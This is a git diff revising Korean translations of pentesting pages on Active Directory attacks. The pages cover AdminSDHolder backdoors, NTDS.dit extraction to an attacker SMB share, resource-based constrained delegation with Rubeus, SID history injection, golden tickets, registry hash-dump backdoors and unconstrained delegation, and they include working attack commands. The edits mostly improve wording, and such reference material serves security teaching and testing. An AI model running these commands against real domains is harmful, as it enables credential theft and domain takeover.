 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
 Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
 ```
-스크립트는 복원 프로세스를 가속화하는 데 사용할 수 있습니다: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
+복원 프로세스를 가속화하기 위한 스크립트가 제공됩니다: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
 
 자세한 내용은 [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)을 방문하세요.
 
@@ -46,7 +46,7 @@ DC의 파일 접근은 사용자가 `Server Operators` 그룹의 일원이 아
 
 ### 권한 상승
 
-`PsService` 또는 Sysinternals의 `sc`를 사용하여 서비스 권한을 검사하고 수정할 수 있습니다. 예를 들어, `Server Operators` 그룹은 특정 서비스에 대한 전체 제어 권한을 가지고 있어 임의의 명령 실행 및 권한 상승을 허용합니다.
+Sysinternals의 `PsService` 또는 `sc`를 사용하여 서비스 권한을 검사하고 수정할 수 있습니다. 예를 들어, `Server Operators` 그룹은 특정 서비스에 대한 전체 제어 권한을 가지고 있어 임의의 명령 실행 및 권한 상승을 허용합니다.
 ```cmd
 C:\> .\PsService.exe security AppReadiness
 ```
@@ -98,11 +98,11 @@ expose %cdrive% F:
 end backup
 exit
 ```
-2. 그림자 복사에서 `NTDS.dit` 복사:
+2. 그림자 복사본에서 `NTDS.dit` 복사:
 ```cmd
 Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
 ```
-대안으로, 파일 복사를 위해 `robocopy`를 사용하세요:
+대안으로, 파일 복사를 위해 `robocopy`를 사용하십시오:
 ```cmd
 robocopy /B F:\Windows\NTDS .\ntds ntds.dit
 ```
@@ -117,7 +117,7 @@ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
 ```
 #### wbadmin.exe 사용하기
 
-1. 공격자 머신에서 SMB 서버를 위한 NTFS 파일 시스템을 설정하고 대상 머신에 SMB 자격 증명을 캐시합니다.
+1. 공격자 머신에서 SMB 서버를 위한 NTFS 파일 시스템을 설정하고 대상 머신에서 SMB 자격 증명을 캐시합니다.
 2. 시스템 백업 및 `NTDS.dit` 추출을 위해 `wbadmin.exe`를 사용합니다:
 ```cmd
 net use X: \\<AttackIP>\sharename /user:smbuser password
@@ -167,7 +167,7 @@ sc.exe \\dc01 start dns
 
 #### Mimilib.dll
 
-특정 명령이나 리버스 셸을 실행하도록 수정하여 명령 실행을 위해 mimilib.dll을 사용하는 것도 가능합니다. [이 게시물을 확인하십시오](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) 더 많은 정보를 위해.
+특정 명령이나 리버스 셸을 실행하도록 수정하여 command execution을 위해 mimilib.dll을 사용하는 것도 가능합니다. [이 게시물 확인하기](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)에서 더 많은 정보를 얻을 수 있습니다.
 
 ### WPAD 레코드로 MitM
 
@@ -189,11 +189,11 @@ Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
 ```
 ## Hyper-V 관리자는
 
-Hyper-V 관리자는 Hyper-V에 대한 전체 액세스 권한을 가지며, 이를 통해 가상화된 도메인 컨트롤러에 대한 제어를 얻을 수 있습니다. 여기에는 라이브 DC를 클론하고 NTDS.dit 파일에서 NTLM 해시를 추출하는 것이 포함됩니다.
+Hyper-V 관리자는 Hyper-V에 대한 전체 액세스 권한을 가지고 있으며, 이를 통해 가상화된 도메인 컨트롤러에 대한 제어를 얻을 수 있습니다. 여기에는 라이브 DC를 클론하고 NTDS.dit 파일에서 NTLM 해시를 추출하는 것이 포함됩니다.
 
 ### 악용 예시
 
-Firefox의 Mozilla Maintenance Service는 Hyper-V 관리자가 SYSTEM으로 명령을 실행하는 데 악용될 수 있습니다. 이는 보호된 SYSTEM 파일에 대한 하드 링크를 생성하고 이를 악성 실행 파일로 교체하는 것을 포함합니다:
+Firefox의 Mozilla Maintenance Service는 Hyper-V 관리자가 SYSTEM으로 명령을 실행하는 데 악용될 수 있습니다. 여기에는 보호된 SYSTEM 파일에 대한 하드 링크를 생성하고 이를 악성 실행 파일로 교체하는 것이 포함됩니다:
 ```bash
 # Take ownership and start the service
 takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
@@ -201,15 +201,15 @@ sc.exe start MozillaMaintenance
 ```
 Note: 하드 링크 악용은 최근 Windows 업데이트에서 완화되었습니다.
 
-## Organization Management
+## 조직 관리
 
-**Microsoft Exchange**가 배포된 환경에서는 **Organization Management**라는 특별한 그룹이 중요한 권한을 가지고 있습니다. 이 그룹은 **모든 도메인 사용자의 메일박스에 접근할 수 있는 권한**을 가지며, **'Microsoft Exchange Security Groups'** 조직 단위(OU)에 대한 **전체 제어**를 유지합니다. 이 제어에는 권한 상승을 위해 악용될 수 있는 **`Exchange Windows Permissions`** 그룹이 포함됩니다.
+**Microsoft Exchange**가 배포된 환경에서는 **조직 관리**라는 특별한 그룹이 중요한 기능을 가지고 있습니다. 이 그룹은 **모든 도메인 사용자의 메일박스에 접근할 수 있는 권한**을 가지고 있으며, **'Microsoft Exchange 보안 그룹'** 조직 단위(OU)에 대한 **전체 제어**를 유지합니다. 이 제어에는 권한 상승을 위해 악용될 수 있는 **`Exchange Windows Permissions`** 그룹이 포함됩니다.
 
-### Privilege Exploitation and Commands
+### 권한 악용 및 명령
 
-#### Print Operators
+#### 인쇄 운영자
 
-**Print Operators** 그룹의 구성원은 **`SeLoadDriverPrivilege`**를 포함한 여러 권한을 부여받으며, 이를 통해 **도메인 컨트롤러에 로컬로 로그인**하고, 이를 종료하며, 프린터를 관리할 수 있습니다. 이러한 권한을 악용하기 위해서는, 특히 **`SeLoadDriverPrivilege`**가 낮은 권한의 컨텍스트에서 보이지 않는 경우, 사용자 계정 컨트롤(UAC)을 우회해야 합니다.
+**인쇄 운영자** 그룹의 구성원은 **`SeLoadDriverPrivilege`**를 포함한 여러 권한을 부여받으며, 이를 통해 **도메인 컨트롤러에 로컬로 로그인**하고, 종료하며, 프린터를 관리할 수 있습니다. 이러한 권한을 악용하기 위해서는, 특히 **`SeLoadDriverPrivilege`**가 낮은 권한의 컨텍스트에서 보이지 않는 경우, 사용자 계정 컨트롤(UAC)을 우회해야 합니다.
 
 이 그룹의 구성원을 나열하기 위해 다음 PowerShell 명령이 사용됩니다:
 ```powershell
@@ -224,11 +224,11 @@ Get-NetGroupMember -Identity "Print Operators" -Recurse
 Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
 ```
-RDP를 악용하는 데 대한 추가 정보는 전용 pentesting 리소스에서 찾을 수 있습니다.
+RDP를 악용하는 데 대한 추가 정보는 전용 펜테스팅 리소스에서 찾을 수 있습니다.
 
 #### 원격 관리 사용자
 
-구성원은 **Windows Remote Management (WinRM)**을 통해 PC에 접근할 수 있습니다. 이러한 구성원의 열거는 다음을 통해 수행됩니다:
+구성원은 **Windows 원격 관리(WinRM)**를 통해 PC에 접근할 수 있습니다. 이러한 구성원의 열거는 다음을 통해 수행됩니다:
 ```powershell
 Get-NetGroupMember -Identity "Remote Management Users" -Recurse
 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
diff --git a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
index 07303f978..ada0ec9f2 100644
--- a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -4,9 +4,9 @@
 
 ## RDP 프로세스 주입
 
-만약 **외부 그룹**이 현재 도메인의 어떤 **컴퓨터**에 **RDP 접근** 권한을 가지고 있다면, **공격자**는 **해당 컴퓨터를 손상시키고 그를 기다릴 수 있습니다**.
+만약 **외부 그룹**이 현재 도메인의 어떤 **컴퓨터**에 **RDP 접근** 권한이 있다면, **공격자**는 **그 컴퓨터를 손상시키고 그를 기다릴 수 있습니다**.
 
-해당 사용자가 RDP를 통해 접근하면, **공격자는 그 사용자의 세션으로 전환하여** 외부 도메인에서의 권한을 악용할 수 있습니다.
+해당 사용자가 RDP를 통해 접근하면, **공격자는 그 사용자의 세션으로 전환하여** 외부 도메인에서 그 권한을 악용할 수 있습니다.
 ```powershell
 # Supposing the group "External Users" has RDP access in the current domain
 ## lets find where they could access
@@ -34,9 +34,9 @@ Check **other ways to steal sessions with other tools** [**in this page.**](../.
 
 ## RDPInception
 
-사용자가 **RDP를 통해 머신에 접근**할 때, **공격자**가 그를 **기다리고** 있다면, 공격자는 **사용자의 RDP 세션에 비콘을 주입**할 수 있으며, 만약 **희생자가 RDP를 통해 접근할 때 드라이브를 마운트**했다면, **공격자는 이를 접근할 수 있습니다**.
+사용자가 **RDP를 통해 머신에 접근**할 때, **공격자**가 그를 **기다리고** 있다면, 공격자는 **사용자의 RDP 세션에 비콘을 주입**할 수 있으며, 만약 **희생자가 RDP를 통해 접근할 때 자신의 드라이브를 마운트**했다면, **공격자는 그것에 접근할 수 있습니다**.
 
-이 경우, **희생자의 원래 컴퓨터**를 **백도어**를 **시작 폴더**에 작성하여 **타락**시킬 수 있습니다.
+이 경우, **희생자의** **원래 컴퓨터**를 **백도어**를 **시작 폴더**에 작성하여 **타락**시킬 수 있습니다.
 ```powershell
 # Wait til someone logs in:
 net logons
diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 56cc97b17..ac7097ae1 100644
--- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -14,22 +14,22 @@
 ### New Concepts
 
 제약된 위임에서는 사용자의 _userAccountControl_ 값 내에 있는 **`TrustedToAuthForDelegation`** 플래그가 **S4U2Self**를 수행하는 데 필요하다고 언급되었습니다. 하지만 그것은 완전히 사실이 아닙니다.\
-실제로는 그 값이 없더라도 **서비스**(SPN이 있는 경우)인 경우 어떤 사용자에 대해서도 **S4U2Self**를 수행할 수 있지만, **`TrustedToAuthForDelegation`**이 있는 경우 반환된 TGS는 **Forwardable**이 되고, 그 플래그가 없는 경우 반환된 TGS는 **Forwardable**이 **아닙니다**.
+실제로는 그 값이 없더라도 **서비스**(SPN이 있는 경우)라면 어떤 사용자에 대해서도 **S4U2Self**를 수행할 수 있지만, **`TrustedToAuthForDelegation`**가 있으면 반환된 TGS는 **Forwardable**이 되고, 그 플래그가 없으면 반환된 TGS는 **Forwardable**이 **아닙니다**.
 
-그러나 **S4U2Proxy**에서 사용되는 **TGS**가 **Forwardable이 아닐 경우**, 기본 제약 위임을 악용하려고 하면 **작동하지 않습니다**. 하지만 **Resource-Based constrain delegation**을 악용하려고 하면 **작동합니다**(이는 취약점이 아니라 기능입니다, 분명히).
+그러나 **S4U2Proxy**에서 사용되는 **TGS**가 **Forwardable이 아닐 경우**, 기본 제약된 위임을 악용하려고 해도 **작동하지 않습니다**. 하지만 **Resource-Based constrain delegation**을 악용하려고 하면 **작동합니다**(이는 취약점이 아니라 기능입니다, 분명히).
 
 ### Attack structure
 
-> **Computer** 계정에 대해 **쓰기 동등 권한**이 있는 경우 해당 머신에서 **특권 액세스**를 얻을 수 있습니다.
+> **컴퓨터** 계정에 대해 **쓰기 동등 권한**이 있는 경우 해당 머신에서 **특권 액세스**를 얻을 수 있습니다.
 
 공격자가 이미 **희생 컴퓨터에 대한 쓰기 동등 권한**을 가지고 있다고 가정합니다.
 
-1. 공격자는 **SPN**이 있는 계정을 **타협**하거나 **하나를 생성**합니다 (“Service A”). **Admin User**는 특별한 권한 없이도 최대 10개의 **Computer objects**(**_MachineAccountQuota_**)를 **생성**하고 **SPN**을 설정할 수 있습니다. 따라서 공격자는 단순히 컴퓨터 객체를 생성하고 SPN을 설정할 수 있습니다.
+1. 공격자는 **SPN**이 있는 계정을 **타협**하거나 **하나를 생성**합니다 (“Service A”). **특별한 권한**이 없는 **모든** _관리 사용자_는 최대 10개의 **컴퓨터 객체**(**_MachineAccountQuota_**)를 **생성**하고 **SPN**을 설정할 수 있습니다. 따라서 공격자는 단순히 컴퓨터 객체를 생성하고 SPN을 설정할 수 있습니다.
 2. 공격자는 희생 컴퓨터(ServiceB)에 대한 **쓰기 권한**을 **악용**하여 **ServiceA가 해당 희생 컴퓨터(ServiceB)에 대해 어떤 사용자를 가장할 수 있도록 리소스 기반 제약 위임을 구성**합니다.
 3. 공격자는 Rubeus를 사용하여 **특권 액세스가 있는 사용자**에 대해 Service A에서 Service B로 **전체 S4U 공격**(S4U2Self 및 S4U2Proxy)을 수행합니다.
-1. S4U2Self (타협/생성된 SPN에서): **관리자에게 TGS 요청** (Forwardable 아님).
+1. S4U2Self (타협/생성된 SPN에서): **관리자에게 TGS를 요청**합니다 (Forwardable 아님).
 2. S4U2Proxy: 이전 단계의 **Forwardable이 아닌 TGS**를 사용하여 **희생 호스트**에 대한 **관리자**의 **TGS**를 요청합니다.
-3. Forwardable이 아닌 TGS를 사용하더라도, Resource-based constrained delegation을 악용하고 있으므로 작동합니다.
+3. Forwardable이 아닌 TGS를 사용하더라도, Resource-based constrained delegation을 악용하고 있으므로 **작동합니다**.
 4. 공격자는 **티켓을 전달**하고 **사용자를 가장하여 희생 ServiceB에 대한 **액세스**를 얻을 수 있습니다.
 
 도메인의 _**MachineAccountQuota**_를 확인하려면 다음을 사용할 수 있습니다:
@@ -81,12 +81,12 @@ msds-allowedtoactonbehalfofotheridentity
 ```bash
 rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
 ```
-Rubeus의 `/altservice` 매개변수를 사용하여 한 번만 요청하여 더 많은 티켓을 생성할 수 있습니다:
+Rubeus의 `/altservice` 매개변수를 사용하여 한 번 요청하는 것만으로 더 많은 티켓을 생성할 수 있습니다:
 ```bash
 rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
 ```
 > [!CAUTION]
-> 사용자는 "**위임할 수 없음**"이라는 속성을 가지고 있습니다. 사용자가 이 속성이 True로 설정되어 있으면, 그를 가장할 수 없습니다. 이 속성은 bloodhound 내에서 확인할 수 있습니다.
+> 사용자는 "**위임할 수 없음**"이라는 속성을 가지고 있습니다. 사용자가 이 속성이 True로 설정되어 있으면, 해당 사용자를 가장할 수 없습니다. 이 속성은 bloodhound 내에서 확인할 수 있습니다.
 
 ### Accessing
 
diff --git a/src/windows-hardening/active-directory-methodology/security-descriptors.md b/src/windows-hardening/active-directory-methodology/security-descriptors.md
index c1938c8b3..668fe6b15 100644
--- a/src/windows-hardening/active-directory-methodology/security-descriptors.md
+++ b/src/windows-hardening/active-directory-methodology/security-descriptors.md
@@ -4,7 +4,7 @@
 
 ## Security Descriptors
 
-[From the docs](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language): 보안 설명자 정의 언어(SDDL)는 보안 설명자를 설명하는 데 사용되는 형식을 정의합니다. SDDL은 DACL 및 SACL에 대해 ACE 문자열을 사용합니다: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
+[From the docs](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language): Security Descriptor Definition Language (SDDL)는 보안 설명자를 설명하는 데 사용되는 형식을 정의합니다. SDDL은 DACL 및 SACL에 대해 ACE 문자열을 사용합니다: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
 
 **보안 설명자**는 **객체**가 **객체**에 대해 **가진** **권한**을 **저장**하는 데 사용됩니다. 객체의 **보안 설명자**에 **조금만 변경**을 가할 수 있다면, 특권 그룹의 구성원이 될 필요 없이 해당 객체에 대한 매우 흥미로운 권한을 얻을 수 있습니다.
 
@@ -19,14 +19,14 @@ Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2'
 ```
 ### WinRM 접근
 
-**사용자에게 winrm PS 콘솔에 대한 접근 권한 부여** [**이것을 사용하여**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
+**사용자에게 winrm PS 콘솔에 대한 접근 권한 부여** [**이 방법을 사용하여**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
 ```bash
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
 ```
 ### 해시 원격 접근
 
-**레지스트리**에 접근하고 **해시 덤프**를 생성하여 **Reg 백도어를 사용하여** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** 언제든지 **컴퓨터의 해시**, **SAM** 및 컴퓨터의 모든 **캐시된 AD** 자격 증명을 검색할 수 있습니다. 따라서, 도메인 컨트롤러 컴퓨터에 대해 **일반 사용자에게 이 권한을 부여하는 것이 매우 유용합니다**:
+**레지스트리**에 접근하고 **해시 덤프**를 생성하여 **Reg 백도어를 사용하여** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** 언제든지 **컴퓨터의 해시**, **SAM** 및 컴퓨터의 모든 **캐시된 AD** 자격 증명을 검색할 수 있습니다. 따라서, 이는 **도메인 컨트롤러 컴퓨터에 대한 일반 사용자에게 이 권한을 부여하는 데 매우 유용합니다**:
 ```bash
 # allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
 Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
diff --git a/src/windows-hardening/active-directory-methodology/sid-history-injection.md b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
index 5511ef697..1a3fc7d1b 100644
--- a/src/windows-hardening/active-directory-methodology/sid-history-injection.md
+++ b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
@@ -4,15 +4,15 @@
 
 ## SID History Injection Attack
 
-**SID History Injection Attack**의 초점은 **도메인 간 사용자 마이그레이션**을 지원하면서 이전 도메인의 리소스에 대한 지속적인 접근을 보장하는 것입니다. 이는 **사용자의 이전 보안 식별자(SID)를 새 계정의 SID History에 통합함으로써** 이루어집니다. 특히, 이 과정은 상위 도메인에서 고급 권한 그룹(예: Enterprise Admins 또는 Domain Admins)의 SID를 SID History에 추가하여 무단 접근을 부여하도록 조작될 수 있습니다. 이 악용은 상위 도메인 내의 모든 리소스에 대한 접근을 부여합니다.
+**SID History Injection Attack**의 초점은 **도메인 간 사용자 마이그레이션**을 지원하면서 이전 도메인의 리소스에 대한 지속적인 접근을 보장하는 것입니다. 이는 **사용자의 이전 보안 식별자(SID)를 새로운 계정의 SID History에 통합함으로써** 이루어집니다. 특히, 이 과정은 상위 도메인에서 고급 권한 그룹(예: Enterprise Admins 또는 Domain Admins)의 SID를 SID History에 추가하여 무단 접근을 부여하도록 조작될 수 있습니다. 이 악용은 상위 도메인 내의 모든 리소스에 대한 접근을 부여합니다.
 
 이 공격을 실행하는 두 가지 방법이 있습니다: **Golden Ticket** 또는 **Diamond Ticket**의 생성입니다.
 
-**"Enterprise Admins"** 그룹의 SID를 정확히 찾으려면 먼저 루트 도메인의 SID를 찾아야 합니다. 식별 후, Enterprise Admins 그룹 SID는 루트 도메인의 SID에 `-519`를 추가하여 구성할 수 있습니다. 예를 들어, 루트 도메인 SID가 `S-1-5-21-280534878-1496970234-700767426`인 경우, "Enterprise Admins" 그룹의 결과 SID는 `S-1-5-21-280534878-1496970234-700767426-519`가 됩니다.
+**"Enterprise Admins"** 그룹의 SID를 찾으려면 먼저 루트 도메인의 SID를 찾아야 합니다. 식별 후, Enterprise Admins 그룹 SID는 루트 도메인의 SID에 `-519`를 추가하여 구성할 수 있습니다. 예를 들어, 루트 도메인 SID가 `S-1-5-21-280534878-1496970234-700767426`인 경우, "Enterprise Admins" 그룹의 결과 SID는 `S-1-5-21-280534878-1496970234-700767426-519`가 됩니다.
 
 또한 **Domain Admins** 그룹을 사용할 수도 있으며, 이는 **512**로 끝납니다.
 
-다른 도메인의 그룹(SID, 예: "Domain Admins")을 찾는 또 다른 방법은:
+다른 도메인의 그룹(SID, 예: "Domain Admins")을 찾는 또 다른 방법은 다음과 같습니다:
 ```powershell
 Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
 ```
@@ -49,7 +49,7 @@ Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_s
 
 # You can use "Administrator" as username or any other string
 ```
-다이아몬드 티켓에 대한 자세한 정보는 다음을 확인하세요:
+다이아몬드 티켓에 대한 자세한 내용은 다음을 확인하세요:
 
 {{#ref}}
 diamond-ticket.md
@@ -71,7 +71,7 @@ schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTE
 
 schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
 ```
-획득한 권한을 사용하여 새로운 도메인에서 예를 들어 DCSync 공격을 실행할 수 있습니다:
+공격으로 획득한 권한을 사용하여 새 도메인에서 예를 들어 DCSync 공격을 실행할 수 있습니다:
 
 {{#ref}}
 dcsync.md
@@ -109,7 +109,7 @@ psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.1
 흐름은 다음과 같습니다:
 
 - 부모 도메인의 Enterprise Admins 그룹에 대한 SID를 얻습니다.
-- 자식 도메인의 KRBTGT 계정 해시를 검색합니다.
+- 자식 도메인의 KRBTGT 계정에 대한 해시를 검색합니다.
 - Golden Ticket을 생성합니다.
 - 부모 도메인에 로그인합니다.
 - 부모 도메인의 Administrator 계정에 대한 자격 증명을 검색합니다.
@@ -117,7 +117,7 @@ psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.1
 ```bash
 raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
 ```
-## 참고문헌
+## 참고 문헌
 
 - [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)
 - [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)
diff --git a/src/windows-hardening/active-directory-methodology/silver-ticket.md b/src/windows-hardening/active-directory-methodology/silver-ticket.md
index 4af140453..5439f2d95 100644
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -55,11 +55,11 @@ CIFS 서비스는 피해자의 파일 시스템에 접근하기 위한 일반적
 
 ## 서비스 티켓 악용
 
-다음 예제에서는 티켓이 관리자 계정을 가장하여 검색된다고 가정해 보겠습니다.
+다음 예제에서는 티켓이 관리자 계정을 가장하여 검색되었다고 가정해 보겠습니다.
 
 ### CIFS
 
-이 티켓을 사용하면 **SMB**를 통해 `C$` 및 `ADMIN$` 폴더에 접근할 수 있으며(노출된 경우) 원격 파일 시스템의 일부에 파일을 복사할 수 있습니다.
+이 티켓을 사용하면 `C$` 및 `ADMIN$` 폴더에 **SMB**를 통해 접근할 수 있으며(노출된 경우) 원격 파일 시스템의 일부에 파일을 복사할 수 있습니다.
 ```bash
 dir \\vulnerable.computer\C$
 dir \\vulnerable.computer\ADMIN$
@@ -116,7 +116,7 @@ New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
 {{#endref}}
 
 > [!WARNING]
-> **winrm이 원격 컴퓨터에서 활성화되고 수신 대기 중이어야** 액세스할 수 있습니다.
+> 원격 컴퓨터에서 **winrm이 활성화되어 있고 수신 대기 중이어야** 액세스할 수 있습니다.
 
 ### LDAP
 
diff --git a/src/windows-hardening/active-directory-methodology/skeleton-key.md b/src/windows-hardening/active-directory-methodology/skeleton-key.md
index f658a3347..7cc5179b9 100644
--- a/src/windows-hardening/active-directory-methodology/skeleton-key.md
+++ b/src/windows-hardening/active-directory-methodology/skeleton-key.md
@@ -20,7 +20,7 @@
 
 - 특히 Mimikatz의 드라이버를 감지하기 위해 다음 명령어를 사용할 수 있습니다: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}`
 
-- `lsass.exe`를 강화하기 위해 보호된 프로세스로 활성화하는 것이 권장됩니다: `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
+- `lsass.exe`를 강화하기 위해 보호된 프로세스로 설정하는 것이 권장됩니다: `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
 
 시스템 재부팅 후 검증은 보호 조치가 성공적으로 적용되었는지 확인하는 데 중요합니다. 이는 다음을 통해 수행할 수 있습니다: `Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*`
 
diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index 5b4473cf7..73c0d0ebc 100644
--- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -4,11 +4,11 @@
 
 ## Unconstrained delegation
 
-이것은 도메인 관리자가 도메인 내의 모든 **컴퓨터**에 설정할 수 있는 기능입니다. 그런 다음, 사용자가 컴퓨터에 로그인할 때마다 해당 사용자의 **TGT 복사본**이 DC에서 제공하는 **TGS 내로 전송되고 LSASS의 메모리에 저장됩니다**. 따라서 해당 머신에서 관리자 권한이 있는 경우, **티켓을 덤프하고 사용자를 가장할 수 있습니다**.
+이것은 도메인 관리자가 도메인 내의 모든 **컴퓨터**에 설정할 수 있는 기능입니다. 그런 다음, 사용자가 컴퓨터에 로그인할 때마다 해당 사용자의 **TGT 복사본**이 DC에서 제공하는 **TGS 내에 전송되고 LSASS의 메모리에 저장됩니다**. 따라서 해당 머신에서 관리자 권한이 있는 경우, **티켓을 덤프하고 사용자를 가장할 수 있습니다**.
 
 따라서 도메인 관리자가 "Unconstrained Delegation" 기능이 활성화된 컴퓨터에 로그인하고 해당 머신에서 로컬 관리자 권한이 있는 경우, 티켓을 덤프하고 도메인 관리자를 어디서든 가장할 수 있습니다 (도메인 권한 상승).
 
-이 속성을 가진 컴퓨터 객체를 **찾으려면** [userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>) 속성이 [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>)를 포함하는지 확인하십시오. 이는 ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’의 LDAP 필터로 수행할 수 있으며, 이는 powerview가 수행하는 것입니다:
+이 속성을 가진 컴퓨터 객체를 **찾으려면** [userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>) 속성이 [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>)를 포함하는지 확인하면 됩니다. 이는 ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’의 LDAP 필터로 수행할 수 있으며, 이는 powerview가 수행하는 것입니다:
 
 <pre class="language-bash"><code class="lang-bash"># List unconstrained computers
 ## Powerview
@@ -23,16 +23,16 @@ kerberos::list /export #Another way
 # Monitor logins and export new tickets
 .\Rubeus.exe monitor /targetuser:&#x3C;username> /interval:10 #Check every 10s for new TGTs</code></pre>
 
-**Mimikatz** 또는 **Rubeus**를 사용하여 메모리에 관리자(또는 피해자 사용자)의 티켓을 로드하여 **[Pass the Ticket](pass-the-ticket.md)**을 수행하십시오.\
+**Mimikatz** 또는 **Rubeus**를 사용하여 메모리에 관리자(또는 피해자 사용자)의 티켓을 로드하여 **[Pass the Ticket](pass-the-ticket.md)**을 수행합니다.\
 자세한 정보: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
-[**Unconstrained delegation에 대한 추가 정보는 ired.team에서 확인하십시오.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
+[**Unconstrained delegation에 대한 추가 정보는 ired.team에서 확인하세요.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
 
 ### **Force Authentication**
 
-공격자가 "Unconstrained Delegation"이 허용된 컴퓨터를 **타락시킬 수 있다면**, 그는 **프린트 서버**를 **자동으로 로그인**하도록 **속일 수 있습니다**, 이로 인해 서버의 메모리에 TGT가 저장됩니다.\
+공격자가 "Unconstrained Delegation"이 허용된 컴퓨터를 **타겟으로 삼을 수 있다면**, 그는 **프린트 서버**를 **속여** **자동으로 로그인**하게 하여 서버의 메모리에 **TGT를 저장**할 수 있습니다.\
 그런 다음 공격자는 사용자 프린트 서버 컴퓨터 계정을 가장하기 위해 **Pass the Ticket 공격을 수행할 수 있습니다**.
 
-프린트 서버가 어떤 머신에 대해 로그인하도록 하려면 [**SpoolSample**](https://github.com/leechristensen/SpoolSample)을 사용할 수 있습니다:
